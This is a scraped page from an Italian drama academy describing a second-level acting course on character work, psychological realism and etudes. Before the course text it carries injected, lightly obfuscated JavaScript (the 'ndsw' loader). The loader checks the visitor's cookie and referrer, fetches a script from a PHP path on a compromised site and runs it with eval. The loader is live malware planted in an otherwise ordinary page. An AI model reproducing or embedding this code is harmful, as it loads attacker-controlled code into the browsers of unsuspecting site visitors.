;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//accademiadeifilodrammatici.it/restyling/wp-admin/css/css.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};

RECITAZIONE II FASE

 

DOCENTE: KARINA ARUTYUNYAN

 


Il corso si incentra sullo studio del personaggio e intende fornire all’allievo elementi e tecniche aggiuntivi a quelli precedentemente acquisiti, attraverso il metodo del realismo psicologico e l’analisi attiva (il metodo degli etudes), così da poter passare dalla fase di esistenza scenica organica della personalità nelle circostanze date, a quella del personaggio.


 

Il lavoro si baserà su un testo drammaturgico che offra un ricco materiale per analizzare i temi e i messaggi dell’opera, esplorare le relazioni fra i personaggi e le loro evoluzioni nel corso della storia, la logica e la dinamica del loro comportamento. Attraverso l’analisi del testo fatto a tavolino e improvvisazioni fisiche e verbali, l’allievo allena le capacità di analisi, composizione e immaginazione; impara a cogliere le proposte dell’autore e tradurle nella tridimensionalità scenica attraverso una partitura ben precisa delle azioni psicofisiche e stati emotivi concreti; struttura e crea un percorso coerente ed ininterrotto della vita del personaggio.

Si studieranno inoltre le tecniche di osservazione e di riproduzione sia del comportamento psico-fisico reale, sia del suo equivalente poetico.

Ogni lezione sarà preceduta da un training psico-fisico che permetta di potenziare, affinare e sviluppare ulteriormente elementi base sia del lavoro dell’attore su se stesso sia del lavoro dell’attore sul personaggio.

 

 


 

< I CORSI